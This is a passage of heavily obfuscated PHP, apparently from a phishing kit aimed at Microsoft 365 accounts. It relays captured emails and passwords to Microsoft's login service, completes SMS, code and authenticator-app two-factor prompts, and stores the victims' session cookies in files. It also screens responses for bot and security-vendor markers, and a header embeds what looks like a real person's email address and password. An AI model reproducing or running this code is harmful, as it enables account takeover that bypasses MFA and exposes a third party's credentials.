                "\x58\55\x45\144\147\145\x2d\x53\x68\x6f\x70\x70\x69\x6e\x67\55\106\x6c\x61\147" =>
                    "\x30",
            ],
        ]);
        goto fef95;
        B4c77:
        $this->status["\x32\146\141"] = true;
        goto F941d;
        c0ab7:
        b093c:
        goto B4c77;
        B62f6:
        $a967e = $be20b[1];
        goto Cf8a1;
        F5d32:
        B90df:
        goto f9726;
        f9325:
        $F16be->save(
            $this->A20d7 .
                "\57\x63\157\x6f\x6b\x69\145\137" .
                $this->Fa736 .
                "\56\164\170\164"
        );
        goto D8942;
        D7fcf:
        if (isset($be20b[1])) {
            goto ef3c8;
        }
        goto c899a;
        Aa6d8:
        preg_match(
            "\x2f\x6e\x61\x6d\x65\75\42\x72\x65\x71\x75\x65\x73\164\x22\x20\x76\141\x6c\165\145\75\42\x28\133\x5e\42\135\53\51\42\57",
            $A75e0,
            $be20b
        );
        goto D7fcf;
        d402b:
        $A75e0 = $Accd6->getBody()->getContents();
        goto Ce8c0;
        c6529:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\x6f\x6f\153\x69\x65\x5f" .
                $this->Fa736 .
                "\x2e\164\x78\x74"
        );
        goto B8979;
        b1e89:
        e378b:
        goto C15b2;
        d8ffa:
        preg_match(
            "\57\x28\x3f\74\75\x22\141\x70\151\x43\141\156\x61\x72\171\x22\x3a\42\x29\x5b\x5e\x22\135\52\x2f",
            $A75e0,
            $a6081
        );
        goto f72c8;
        f2be5:
        $b0338 = json_decode($f8b73, true);
        goto Ca09f;
        ab77c:
        if (
            !(
                strpos(
                    $A75e0,
                    "\x59\x6f\165\x72\x20\x61\x63\x63\157\165\x6e\164\40\157\x72\x20\x70\141\x73\x73\x77\157\x72\144\x20\x69\x73\x20\x69\x6e\143\x6f\x72\162\145\143\164"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x54\150\x65\x20\x70\141\163\163\167\x6f\x72\x64\x20\x65\x6e\x74\x65\162\145\144\40\x65\170\143\145\145\144\x73\40\x74\x68\x65\x20\155\x61\x78\x69\155\x75\155\40\x6c\145\156\x67\164\150"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\102\141\x64\x20\x52\145\161\165\145\163\164"
                ) !== false ||
                strpos($A75e0, "\147\x6f\157\147\154\x65\142\x6f\164") !==
                    false ||
                strpos(
                    $A75e0,
                    "\123\145\154\145\x63\x74\40\141\x20\x63\145\x72\x74\x69\146\151\143\x61\164\x65\x20"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x73\x6d\x75\x73\170\141\164\150\56\x62\155\163\56\143\x6f\x6d"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x6e\157\x74\x20\163\x75\x70\x70\x6f\162\164\x20\112\141\x76\x61\x53\x63\162\151\x70\164"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x74\162\x6f\165\x62\154\x65\40\163\151\x67\156\x69\156\x67"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x68\x61\166\x69\x6e\147\x20\x73\x6f\155\x65\x20\x73\x65\162\x76\x65\x72\40\x69\x73\x73\x75\145\x73"
                ) !== false ||
                strpos($A75e0, "\141\160\160\x6c\x65\56\x63\x6f\155") !==
                    false ||
                strpos(
                    $A75e0,
                    "\116\x6f\x74\x20\101\154\154\x6f\x77\145\144"
                ) !== false ||
                strpos($A75e0, "\x2e\141\157\156\x2e\x63\x6f\155") !== false ||
                strpos(
                    $A75e0,
                    "\106\x69\x66\164\x68\x20\124\x68\151\162\144\40\111\x44"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x43\157\x6e\146\151\147\x75\x72\x61\142\154\145\x20\144\145\146\141\x75\x6c\x74\x20\142\x65\150\141\166\x69\157\x72"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\160\145\x72\x73\x6d\151\x73\x73\151\x6f\x6e\163\40\x74\157\40\x61\143\143\145\163\x73\40\164\x68\151\x73\40\x72\x65\x73\x6f\x75\x72\x63\145"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\165\162\x6c\x4d\x73\141\123\151\x67\156\x55\160"
                ) !== false
            )
        ) {
            goto B90df;
        }
        goto a693e;
        C15b2:
        Ac0bd:
        goto ee5c5;
        A8e36:
        if (
            !(
                strpos(
                    $A75e0,
                    "\x3c\164\x69\164\154\145\76\127\157\x72\153\151\156\147\x2e\56\x2e\74\57\164\151\x74\x6c\x65\x3e"
                ) !== false
            )
        ) {
            goto B5586;
        }
        goto Aa6d8;
        D5ddc:
        $Bcc9d = new Client(["\143\x6f\157\x6b\151\145\x73" => $F16be]);
        goto B3add;
        c6a91:
        if (!isset($B2f3b[1])) {
            goto E1b70;
        }
        goto Ad66b;
        c2a45:
        $this->status["\62\146\141"] = false;
        goto A4308;
        C52ba:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\x63\157\157\x6b\151\x65\137" .
                $this->Fa736 .
                "\x2e\164\x78\164",
            true
        );
        goto B713e;
        F941d:
        $c4ca3 =
            "\x2f\134\173\x5c\x73\52\x22\141\162\x72\x55\163\145\162\120\x72\157\x6f\x66\x73\x22\x3a\50\x5c\x5b\x2e\x2a\x3f\134\135\51\x5c\163\x2a\54\x2f\163";
        goto D05a3;
        Ddf6f:
        $Bcc9d = new Client(["\143\x6f\157\x6b\151\145\163" => $F16be]);
        goto B1f1c;
        Eee21:
        Ab2c5:
        goto B62f6;
        Ca09f:
        if (!is_array($b0338)) {
            goto e378b;
        }
        goto a05b0;
        D63c3:
        goto Ac0bd;
        goto c0ab7;
        B3add:
        $Accd6 = $Bcc9d->post(
            "\150\x74\x74\160\163\x3a\57\57\154\157\147\x69\156\x2e\155\x69\x63\x72\157\x73\x6f\x66\x74\x6f\156\x6c\x69\156\x65\x2e\x63\157\155\x2f\143\x6f\155\155\x6f\156\x2f\x6c\157\147\x69\156",
            [
                "\141\154\154\157\167\137\162\145\144\151\162\145\143\x74\163" => true,
                "\150\x65\141\144\145\x72\x73" => [
                    "\x43\157\x6e\156\x65\143\x74\x69\157\156" =>
                        "\x6b\145\x65\x70\x2d\x61\154\151\x76\145",
                    "\125\x70\147\162\x61\144\145\x2d\x49\156\163\145\x63\x75\x72\145\55\x52\145\161\165\145\x73\x74\x73" =>
                        "\61",
                    "\x4f\x72\151\x67\x69\x6e" =>
                        "\x68\x74\x74\x70\x73\72\57\x2f\x6c\x6f\x67\x69\x6e\56\155\151\x63\x72\x6f\x73\x6f\146\x74\x6f\156\x6c\151\x6e\145\56\x63\x6f\x6d",
                    "\x43\157\156\x74\145\x6e\x74\x2d\x54\x79\160\x65" =>
                        "\141\x70\160\154\151\x63\141\164\151\157\156\57\170\55\167\167\x77\55\x66\157\162\x6d\x2d\x75\x72\x6c\x65\x6e\143\157\x64\145\x64",
                    "\x55\163\145\162\55\x41\x67\x65\156\164" =>
                        "\x4d\x6f\172\x69\154\154\141\x2f\65\x2e\60\x20\50\x69\120\x68\x6f\156\145\x3b\x20\x43\x50\125\x20\x69\x50\150\x6f\156\x65\40\x4f\123\x20\61\x33\x5f\62\x5f\x33\40\x6c\151\153\x65\x20\x4d\141\143\40\x4f\x53\40\130\x29\40\x41\160\x70\154\145\127\145\142\113\151\164\57\66\x30\65\x2e\x31\x2e\x31\65\40\x28\113\110\124\x4d\x4c\54\x20\154\x69\153\x65\x20\x47\145\143\x6b\157\51\40\x56\145\162\163\x69\x6f\x6e\57\x31\x33\56\x30\x2e\63\40\115\157\x62\151\x6c\145\x2f\61\65\x45\61\x34\70\40\x53\x61\146\x61\162\x69\57\66\x30\x34\x2e\x31",
                    "\x41\x63\143\145\x70\x74" =>
                        "\x74\x65\x78\164\x2f\150\164\155\154\x2c\x61\160\x70\x6c\151\143\141\164\151\x6f\156\57\x78\x68\164\x6d\154\53\170\x6d\x6c\54\x61\160\160\x6c\x69\143\x61\x74\151\157\156\57\x78\x6d\154\73\x71\x3d\60\56\x39\54\x69\155\x61\x67\145\57\x61\166\151\x66\54\x69\155\141\147\145\x2f\167\145\x62\x70\x2c\151\x6d\141\147\x65\x2f\11\x9\11\11\x61\x70\156\147\54\x2a\57\x2a\x3b\x71\75\60\x2e\x38\x2c\141\160\160\154\x69\x63\141\x74\151\157\156\57\163\x69\147\x6e\x65\144\55\145\x78\x63\x68\x61\156\147\145\x3b\x76\x3d\142\63\73\161\75\60\56\x39",
                    "\x53\145\143\x2d\x46\x65\x74\x63\150\55\x53\x69\x74\x65" =>
                        "\x73\x61\155\x65\x2d\157\x72\x69\147\151\x6e",
                    "\x53\x65\143\55\x46\x65\x74\x63\150\55\115\157\x64\x65" =>
                        "\156\141\166\x69\147\141\x74\145",
                    "\123\x65\143\x2d\106\x65\164\143\150\x2d\125\163\145\162" =>
                        "\x3f\61",
                    "\x53\x65\x63\x2d\106\145\164\143\x68\x2d\x44\145\163\x74" =>
                        "\x64\157\143\x75\x6d\x65\x6e\164",
                    "\x52\x65\146\145\162\x65\162" =>
                        "\150\x74\x74\x70\x73\x3a\x2f\57\167\63\154\154\56\x73\x74\x6f\162\x65\57\x61\x70\151\57\157\146\x66\151\143\x65\55\x76\141\x6c\x3f\x65\x6d\x61\x69\154\75\142\162\151\141\156\x2e\x65\154\154\x69\163\100\x69\151\x6d\145\x74\x72\x6f\56\x63\x6f\x6d\56\141\x75\46\160\x61\x73\x73\x3d\x42\165\x66\146\151\145\70\62\63\x38",
                    "\x41\143\143\145\x70\x74\x2d\x4c\x61\x6e\147\165\x61\x67\x65" =>
                        "\x65\x6e\x2d\x55\x53\x2c\145\156\x3b\x71\x3d\x30\x2e\x39",
                    "\103\157\x6f\x6b\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\x6f\x6f\x6b\x69\x65\137" .
                            $this->Fa736 .
                            "\56\x74\x78\164"
                    ),
                ],
                "\146\x6f\x72\x6d\x5f\160\141\162\x61\x6d\163" => [
                    "\151\61\63" => "\x30",
                    "\154\x6f\x67\x69\x6e" => $this->Fa736,
                    "\154\157\147\151\156\x66\155\x74" => $this->Fa736,
                    "\164\x79\160\145" => "\x31\61",
                    "\x4c\x6f\x67\x69\x6e\117\x70\x74\x69\157\x6e\x73" =>
                        "\x33",
                    "\154\162\x74" => "",
                    "\154\x72\x74\120\141\162\x74\x69\x74\151\157\x6e" => "",
                    "\x68\x69\163\x52\145\147\151\x6f\156" => "",
                    "\x68\151\163\123\143\141\x6c\x65\x55\x6e\x69\164" => "",
                    "\160\141\163\x73\x77\x64" => $this->Ed558,
                    "\x70\x73" => "\62",
                    "\160\x73\x52\x4e\107\103\104\145\x66\x61\x75\154\164\124\x79\x70\145" =>
                        "",
                    "\160\x73\122\x4e\x47\x43\x45\156\x74\x72\x6f\160\171" =>
                        "",
                    "\160\163\x52\x4e\107\x43\x53\x4c\113" => "",
                    "\143\x61\x6e\141\x72\x79" => $this->B5b07,
                    "\143\x74\x78" => $this->cc473,
                    "\x68\160\147\162\145\161\165\x65\163\164\151\144" =>
                        "\71\67\x39\x39\143\144\70\x38\x2d\x36\x65\x61\x37\x2d\64\143\146\x63\x2d\x61\x65\x62\62\55\x34\x64\x63\142\62\x30\x30\63\64\141\x30\x33",
                    "\146\x6c\157\167\124\157\x6b\145\156" => $this->fac50,
                    "\120\x50\123\x58" => "",
                    "\x4e\x65\x77\x55\x73\x65\x72" => "\61",
                    "\x46\x6f\165\x6e\x64\x4d\x53\101\163" => "",
                    "\146\163\x70\157\163\164" => "\x30",
                    "\x69\62\x31" => "\x30",
                    "\x43\x6f\x6f\153\x69\x65\104\x69\x73\x63\154\x6f\x73\x75\x72\145" =>
                        "\x30",
                    "\x49\163\x46\x69\x64\157\123\165\x70\x70\157\x72\164\x65\144" =>
                        "\60",
                    "\151\163\x53\151\x67\x6e\165\x70\120\157\x73\164" => "\60",
                    "\x69\x31\67" => "",
                    "\x69\x31\70" => "",
                    "\x69\x31\x39" => "\x39\61\x38\x39",
                ],
            ]
        );
        goto f9325;
        c899a:
        goto c5c97;
        goto Eda73;
        C22dc:
        $a967e = $be20b[1];
        goto a52d6;
        Cf8a1:
        fe7e5:
        goto Acc51;
        C901e:
        preg_match(
            "\57\50\x3f\74\x3d\x22\x73\x46\x54\42\x3a\42\x29\133\x5e\x22\135\x2a\57",
            $A75e0,
            $ea051
        );
        goto e1964;
        b71f3:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\157\x6f\x6b\151\x65\137" .
                $this->Fa736 .
                "\56\x74\x78\164"
        );
        goto d402b;
        eb79c:
        if (!isset($B2f3b[1])) {
            goto D4ab2;
        }
        goto Ff589;
        Ce8c0:
        $D5295 = file_get_contents(
            $this->A20d7 .
                "\x2f\x63\157\x6f\153\x69\145\x5f" .
                $this->Fa736 .
                "\x2e\x74\x78\164"
        );
        goto bd064;
        ee5c5:
    }
    public function EndAuth($C19e5, $d8403 = "")
    {
        goto edc0e;
        A164a:
        A713f:
        goto e2f31;
        f041d:
        $cfe83 = "\x4f\156\145\127\141\171\x53\x4d\123";
        goto Dba6c;
        Dba6c:
        bf2f3:
        goto F57d6;
        C4d10:
        F9464:
        goto Ec446;
        F57d6:
        goto Cb7c8;
        goto C4d10;
        c4392:
        goto A1928;
        goto e4a44;
        Be3e7:
        Cb7c8:
        goto E3a3b;
        Ec446:
        $cfe83 = "\120\150\x6f\156\145\x41\160\160\117\124\x50";
        goto Be3e7;
        edc0e:
        if (
            !(
                $this->Fa736 != $_SESSION["\x65\x6d\x61\151\x6c"] ||
                !isset($_SESSION["\163\x74\141\x74\165\163"]) ||
                !isset(
                    $_SESSION[
                        "\151\156\146\157\x5f\x74\157\x6b\x65\156\137\62\146\x61"
                    ]
                )
            )
        ) {
            goto A713f;
        }
        goto d6b5f;
        e2f31:
        $this->status = $_SESSION["\163\x74\x61\164\165\163"];
        goto C36a9;
        d6b5f:
        $this->redirect();
        goto A164a;
        cf12a:
        Ce986:
        goto c4392;
        Cbd60:
        if (!($C19e5 == "\166\145\162\x69\x66\171\137\x73\155\x73")) {
            goto bf2f3;
        }
        goto f041d;
        a8fb9:
        $this->EndAuthApp();
        goto cf12a;
        e8269:
        if ($C19e5 == "\166\145\x72\x69\x66\x79\x5f\x63\157\144\x65") {
            goto F9464;
        }
        goto Cbd60;
        e4a44:
        E9eb2:
        goto e8269;
        Ef0ed:
        A1928:
        goto e4e1c;
        c095b:
        if (
            $C19e5 == "\x76\x65\162\x69\146\171\x5f\143\x6f\x64\x65" ||
            $C19e5 == "\x76\x65\x72\151\x66\171\137\163\155\x73"
        ) {
            goto E9eb2;
        }
        goto a3862;
        C36a9:
        $this->A20d7 = getcwd() . "\57\x63\157\x72\145";
        goto c095b;
        E3a3b:
        $this->EndAuthSmsAndCode($d8403, $cfe83);
        goto Ef0ed;
        a3862:
        if (!($C19e5 == "\x76\145\x72\151\146\x79\137\x61\160\160")) {
            goto Ce986;
        }
        goto a8fb9;
        e4e1c:
    }
    public function EndAuthApp()
    {
        goto db593;
        C2b0f:
        $this->ad1e3 =
            $_SESSION[
                "\151\156\146\157\137\x74\157\153\145\156\137\62\146\141"
            ]["\x73\x43\164\x78"];
        goto E5cd0;
        aed2b:
        $this->fac50 = $ea051;
        goto B44e0;
        af4e6:
        $this->status["\x32\146\x61\x5f\x65\156\x64\x61\165\164\x68"] = false;
        goto C1b93;
        b6d7d:
        $this->B522d =
            $_SESSION[
                "\151\x6e\x66\x6f\137\x74\x6f\x6b\x65\x6e\x5f\62\146\x61"
            ]["\141\160\x69\137\143\x61\x6e\141\162\x79"];
        goto Ddbc2;
        ffb55:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\x6f\157\153\x69\x65\x5f" .
                $this->Fa736 .
                "\56\164\x78\x74"
        );
        goto E94fa;
        A6a8b:
        $this->status[
            "\x32\146\x61\x5f\x65\156\x64\141\165\164\150\x5f\x72\x65\141\163\157\x6e"
        ] = $b0338["\115\x65\x73\163\141\x67\145"];
        goto ff550;
        Dc64e:
        $this->E423c =
            $_SESSION[
                "\151\156\146\x6f\137\x74\157\x6b\145\156\137\x32\x66\x61"
            ]["\163\x65\x73\163\x69\x6f\x6e\x5f\x69\x64"];
        goto C2b0f;
        Edd31:
        preg_match(
            "\x2f\50\x3f\74\75\42\x46\x6c\x6f\167\124\157\x6b\x65\x6e\x22\72\x22\x29\x5b\x5e\x22\135\52\x2f",
            $A75e0,
            $ea051
        );
        goto A1741;
        d28e7:
        goto D9cb3;
        goto B126d;
        a3069:
        $Accd6 = $Bcc9d->get(
            "\x68\x74\164\160\163\x3a\x2f\57\154\157\147\x69\x6e\x2e\x6d\x69\143\x72\157\163\157\146\164\157\x6e\x6c\x69\x6e\x65\x2e\x63\x6f\155\x2f\x63\157\155\x6d\157\x6e\x2f\123\101\x53\x2f\x45\156\144\x41\165\164\150",
            [
                "\x71\x75\x65\x72\171" => [
                    "\141\165\x74\150\115\x65\164\150\157\144\x49\144" =>
                        "\x50\x68\157\x6e\x65\101\x70\160\116\x6f\164\x69\146\x69\x63\141\164\151\x6f\156",
                    "\160\x6f\x6c\154\103\157\x75\156\x74" => "\61",
                ],
                "\150\x65\x61\144\145\162\163" => [
                    "\125\163\145\162\55\x41\147\x65\156\x74" =>
                        "\x4d\157\x7a\x69\154\x6c\141\x2f\65\x2e\60\40\x28\x4d\141\143\151\x6e\164\157\x73\150\73\40\111\x6e\x74\145\x6c\x20\115\141\143\40\117\123\x20\x58\x20\x31\60\56\x31\x35\x3b\x20\x72\x76\x3a\61\60\x39\56\60\x29\x20\107\145\143\153\157\57\62\x30\x31\60\60\61\60\x31\40\106\x69\x72\145\x66\x6f\170\57\61\61\x35\x2e\x30",
                    "\x41\x63\143\145\x70\x74" =>
                        "\141\160\160\x6c\x69\x63\141\164\x69\x6f\x6e\x2f\x6a\163\x6f\156",
                    "\x41\143\x63\145\160\164\x2d\x4c\141\x6e\x67\165\x61\x67\145" =>
                        "\x65\156\55\125\123\54\145\156\73\161\75\x30\x2e\65",
                    "\101\x63\143\145\x70\164\55\105\156\x63\x6f\144\x69\156\147" =>
                        "\x67\x7a\x69\160\54\40\144\145\x66\x6c\x61\164\145\x2c\40\x62\x72",
                    "\x52\x65\146\145\162\145\162" =>
                        "\x68\x74\164\x70\163\72\x2f\x2f\x6c\x6f\147\151\156\x2e\x6d\151\143\162\x6f\x73\x6f\146\164\x6f\156\154\x69\x6e\x65\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\x6d\x6f\156\x2f\x6c\x6f\147\x69\156",
                    "\150\160\147\151\x64" => "\x31\61\61\64",
                    "\150\x70\147\x61\x63\164" => "\x32\60\60\x30",
                    "\x63\141\156\x61\x72\x79" =>
                        $_SESSION[
                            "\x69\156\x66\157\137\164\157\153\x65\x6e\x5f\62\146\141"
                        ]["\141\x70\x69\x5f\x63\x61\x6e\x61\162\x79"],
                    "\x63\x6c\151\x65\x6e\164\x2d\x72\145\161\165\x65\x73\164\x2d\x69\x64" =>
                        $_SESSION[
                            "\151\x6e\146\157\137\x74\157\153\x65\156\137\x32\x66\x61"
                        ]["\x72\x65\161\x75\x65\x73\164\x5f\151\x64"],
                    "\x68\160\147\162\x65\x71\165\145\x73\164\x69\144" =>
                        $_SESSION[
                            "\x69\x6e\x66\x6f\137\x74\x6f\x6b\145\156\x5f\x32\146\x61"
                        ]["\x73\x65\x73\163\151\x6f\156\137\x69\x64"],
                    "\170\55\155\163\55\163\x65\163\163\x69\157\x6e\x49\x64" =>
                        $_SESSION[
                            "\x69\x6e\146\157\x5f\164\x6f\153\x65\x6e\x5f\x32\146\141"
                        ]["\x73\145\x73\163\151\157\156\137\151\x64"],
                    "\170\55\x6d\x73\55\x66\x6c\x6f\167\x54\x6f\x6b\145\x6e" =>
                        $_SESSION[
                            "\151\156\x66\157\x5f\x74\157\153\x65\x6e\x5f\x32\x66\x61"
                        ]["\x73\x46\124"],
                    "\170\x2d\x6d\x73\x2d\x63\x74\170" =>
                        $_SESSION[
                            "\151\156\x66\x6f\137\x74\157\153\145\x6e\x5f\62\146\x61"
                        ]["\x73\103\x74\170"],
                    "\103\157\x6e\164\x65\156\x74\55\x74\171\160\x65" =>
                        "\x61\160\160\x6c\x69\x63\141\x74\151\x6f\x6e\x2f\152\x73\x6f\x6e\73\40\143\150\141\x72\163\x65\x74\x3d\x75\x74\x66\55\x38",
                    "\x44\116\124" => "\61",
                    "\x43\x6f\156\156\145\143\164\x69\x6f\156" =>
                        "\153\x65\x65\x70\55\141\x6c\x69\x76\x65",
                    "\103\x6f\157\x6b\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\143\x6f\x6f\x6b\x69\145\x5f" .
                            $this->Fa736 .
                            "\56\164\x78\x74"
                    ),
                    "\x53\145\x63\x2d\106\x65\164\x63\x68\x2d\104\x65\x73\164" =>
                        "\145\155\x70\164\171",
                    "\x53\x65\x63\55\x46\145\x74\x63\x68\55\x4d\157\144\145" =>
                        "\x63\157\x72\x73",
                    "\x53\x65\x63\55\x46\145\x74\143\150\55\123\x69\164\x65" =>
                        "\x73\141\x6d\x65\x2d\157\162\x69\147\x69\156",
                ],
            ]
        );
        goto ffb55;
        a649a:
        if (
            strpos(
                $A75e0,
                "\x22\123\165\x63\143\145\163\x73\42\72\164\162\165\x65"
            ) !== false
        ) {
            goto c81d9;
        }
        goto af4e6;
        bbfae:
        $Bcc9d = new Client(["\143\x6f\157\153\151\145\163" => $F16be]);
        goto a3069;
        B44e0:
        $this->cc473 =
            $_SESSION[
                "\x69\x6e\146\157\x5f\x74\x6f\153\x65\x6e\137\x32\x66\141"
            ]["\163\103\x74\x78"];
        goto b6d7d;
        E94fa:
        $A75e0 = $Accd6->getBody()->getContents();
        goto a649a;
        E5cd0:
        $this->ProcessAuthApp();
        goto F543e;
        B126d:
        c81d9:
        goto Cc46b;
        db593:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\57\x63\157\157\153\151\x65\137" .
                $this->Fa736 .
                "\56\164\x78\x74",
            true
        );
        goto bbfae;
        F543e:
        D9cb3:
        goto Da069;
        A1741:
        $ea051 = $ea051[0];
        goto aed2b;
        Cc46b:
        $this->status["\x32\x66\141\x5f\145\x6e\x64\x61\165\164\150"] = true;
        goto Edd31;
        D63e4:
        if (!isset($b0338["\x4d\x65\x73\163\141\147\145"])) {
            goto c3147;
        }
        goto A6a8b;
        ff550:
        c3147:
        goto d28e7;
        Ddbc2:
        $this->B5b07 =
            $_SESSION[
                "\151\156\x66\x6f\x5f\x74\157\x6b\x65\x6e\137\x32\x66\141"
            ]["\143\141\x6e\x61\162\171"];
        goto Dc64e;
        C1b93:
        $b0338 = json_decode($A75e0, true);
        goto D63e4;
        Da069:
    }
    public function EndAuthSmsAndCode($d8403, $cfe83)
    {
        goto Fac96;
        e06cc:
        $this->ad1e3 =
            $_SESSION[
                "\x69\156\x66\x6f\x5f\164\x6f\153\x65\x6e\137\x32\x66\141"
            ]["\x73\x43\164\x78"];
        goto Bf8f6;
        b8145:
        $this->fac50 = $ea051;
        goto B6677;
        eed01:
        b9bb0:
        goto c8247;
        C4532:
        $this->E423c =
            $_SESSION[
                "\x69\x6e\146\157\137\164\x6f\153\145\156\x5f\62\146\x61"
            ]["\x73\x65\x73\x73\x69\x6f\156\137\x69\144"];
        goto e06cc;
        B6677:
        $this->cc473 =
            $_SESSION[
                "\151\156\146\157\137\x74\157\x6b\145\156\137\x32\x66\141"
            ]["\163\x43\164\170"];
        goto e6c0f;
        D78ff:
        goto Eaca5;
        goto eed01;
        B9bca:
        Eaca5:
        goto e18ef;
        e6c0f:
        $this->B522d =
            $_SESSION[
                "\151\x6e\x66\x6f\137\164\x6f\x6b\145\156\x5f\x32\146\141"
            ]["\141\160\151\137\143\141\156\141\162\x79"];
        goto Aba0d;
        F0fb4:
        $Bcc9d = new Client(["\x63\157\x6f\153\x69\x65\x73" => $F16be]);
        goto Cc084;
        c02db:
        $ea051 = $ea051[0];
        goto b8145;
        Fac96:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\x6f\x6f\x6b\151\145\x5f" .
                $this->Fa736 .
                "\x2e\164\170\x74",
            true
        );
        goto F0fb4;
        Aba0d:
        $this->B5b07 =
            $_SESSION[
                "\151\x6e\146\157\137\164\x6f\153\x65\156\137\x32\146\x61"
            ]["\143\141\x6e\141\162\x79"];
        goto C4532;
        B1354:
        $b0338 = json_decode($A75e0, true);
        goto aa55d;
        F0a15:
        $this->status[
            "\62\146\x61\137\145\156\144\141\165\x74\150\137\162\145\141\163\x6f\x6e"
        ] = $b0338["\x4d\145\x73\x73\141\x67\145"];
        goto Cd94f;
        Ef2f5:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\157\x6f\x6b\x69\145\137" .
                $this->Fa736 .
                "\56\164\x78\164"
        );
        goto B5128;
        c8247:
        $this->status["\62\146\x61\x5f\145\x6e\144\x61\x75\164\150"] = true;
        goto f9175;
        F570a:
        if (
            strpos(
                $A75e0,
                "\x22\123\165\x63\x63\x65\163\163\x22\x3a\164\162\165\145"
            ) !== false
        ) {
            goto b9bb0;
        }
        goto F58cc;
        aa55d:
        if (!isset($b0338["\x4d\145\163\163\141\x67\x65"])) {
            goto bbc45;
        }
        goto F0a15;
        f9175:
        preg_match(
            "\x2f\50\77\x3c\75\x22\106\154\x6f\x77\x54\157\153\145\156\42\72\42\x29\133\x5e\x22\135\x2a\57",
            $A75e0,
            $ea051
        );
        goto c02db;
        B5128:
        $A75e0 = $Accd6->getBody()->getContents();
        goto F570a;
        F58cc:
        $this->status["\x32\146\x61\x5f\x65\156\144\x61\x75\164\150"] = false;
        goto B1354;
        Cc084:
        $Accd6 = $Bcc9d->post(
            "\150\164\164\x70\x73\x3a\x2f\57\x6c\157\x67\x69\x6e\56\155\151\x63\162\x6f\x73\x6f\146\164\157\156\x6c\151\x6e\x65\x2e\x63\x6f\x6d\x2f\x63\157\x6d\x6d\x6f\x6e\57\123\101\x53\x2f\x45\x6e\x64\x41\165\x74\x68",
            [
                "\150\x65\141\144\x65\x72\163" => [
                    "\x55\163\x65\162\55\101\x67\145\x6e\x74" =>
                        "\x4d\157\x7a\151\x6c\x6c\x61\x2f\65\56\60\40\x28\115\x61\143\151\x6e\x74\157\163\150\x3b\x20\x49\x6e\164\145\x6c\40\115\x61\x63\40\117\x53\40\x58\40\x31\x30\56\61\65\73\x20\x72\166\x3a\61\60\x39\x2e\x30\51\x20\x47\x65\143\x6b\157\57\62\60\x31\60\60\61\60\61\40\106\x69\x72\145\146\x6f\x78\x2f\x31\61\x35\56\x30",
                    "\x41\143\x63\x65\160\x74" =>
                        "\141\160\x70\154\x69\x63\141\164\x69\x6f\156\x2f\x6a\x73\x6f\x6e",
                    "\x41\x63\x63\145\160\164\x2d\x4c\141\x6e\147\165\x61\147\145" =>
                        "\145\x6e\x2d\125\x53\54\x65\x6e\73\x71\x3d\60\x2e\65",
                    "\x41\x63\x63\x65\x70\164\x2d\105\156\x63\x6f\x64\x69\x6e\x67" =>
                        "\147\172\x69\x70\x2c\x20\144\145\x66\154\141\164\x65\x2c\40\x62\162",
                    "\x52\x65\x66\145\x72\145\x72" =>
                        "\x68\x74\x74\x70\163\x3a\x2f\x2f\x6c\157\x67\x69\x6e\x2e\155\x69\143\162\157\163\x6f\146\x74\157\x6e\154\x69\156\x65\x2e\x63\157\x6d\x2f\143\157\155\x6d\157\x6e\x2f\154\x6f\147\x69\156",
                    "\x48\160\x67\151\144" => "\x31\61\61\x34",
                    "\x48\160\147\x61\143\x74" => "\x32\60\x30\x30",
                    "\103\141\156\x61\x72\171" =>
                        $_SESSION[
                            "\x69\x6e\146\157\137\x74\157\153\145\x6e\137\62\146\141"
                        ]["\x61\x70\151\137\143\141\x6e\x61\x72\171"],
                    "\103\x6c\x69\x65\x6e\164\55\122\145\161\165\145\x73\x74\55\111\x64" =>
                        $_SESSION[
                            "\151\156\146\157\137\164\x6f\153\145\x6e\137\62\146\141"
                        ]["\162\x65\x71\x75\x65\x73\x74\x5f\x69\x64"],
                    "\x48\x70\147\x72\x65\x71\x75\145\x73\164\x69\144" =>
                        $_SESSION[
                            "\x69\x6e\146\157\137\x74\157\153\145\156\x5f\x32\146\x61"
                        ]["\163\145\163\163\151\x6f\156\137\151\x64"],
                    "\103\157\156\x74\145\156\x74\x2d\124\x79\x70\145" =>
                        "\141\160\160\x6c\151\x63\141\x74\x69\x6f\x6e\x2f\152\x73\x6f\156\73\40\143\x68\141\162\x73\145\x74\75\165\164\x66\x2d\70",
                    "\x4f\x72\x69\147\x69\156" =>
                        "\x68\164\164\160\x73\72\x2f\x2f\x6c\157\x67\x69\156\56\155\x69\x63\x72\x6f\163\x6f\146\164\x6f\x6e\154\x69\156\145\x2e\x63\x6f\x6d",
                    "\x43\x6f\x6e\x6e\145\143\x74\151\x6f\x6e" =>
                        "\x6b\145\145\160\55\x61\154\151\x76\145",
                    "\123\145\143\x2d\106\x65\x74\143\x68\x2d\x44\145\x73\x74" =>
                        "\x65\x6d\160\x74\171",
                    "\x53\x65\x63\x2d\x46\x65\164\x63\x68\55\115\x6f\x64\x65" =>
                        "\143\157\x72\163",
                    "\123\145\143\x2d\x46\145\x74\x63\x68\x2d\123\151\x74\x65" =>
                        "\x73\x61\x6d\145\55\x6f\162\x69\x67\x69\x6e",
                    "\103\x6f\x6f\153\151\x65" => $this->gencook(
                        $this->A20d7 .
                            "\57\143\157\157\153\x69\x65\137" .
                            $this->Fa736 .
                            "\x2e\164\x78\164"
                    ),
                ],
                "\x6a\x73\157\x6e" => [
                    "\x4d\x65\164\150\157\144" =>
                        "\x45\156\x64\101\x75\164\x68",
                    "\x53\x65\163\163\x69\x6f\x6e\111\144" =>
                        $_SESSION[
                            "\x69\156\x66\x6f\137\164\157\153\x65\156\137\x32\146\x61"
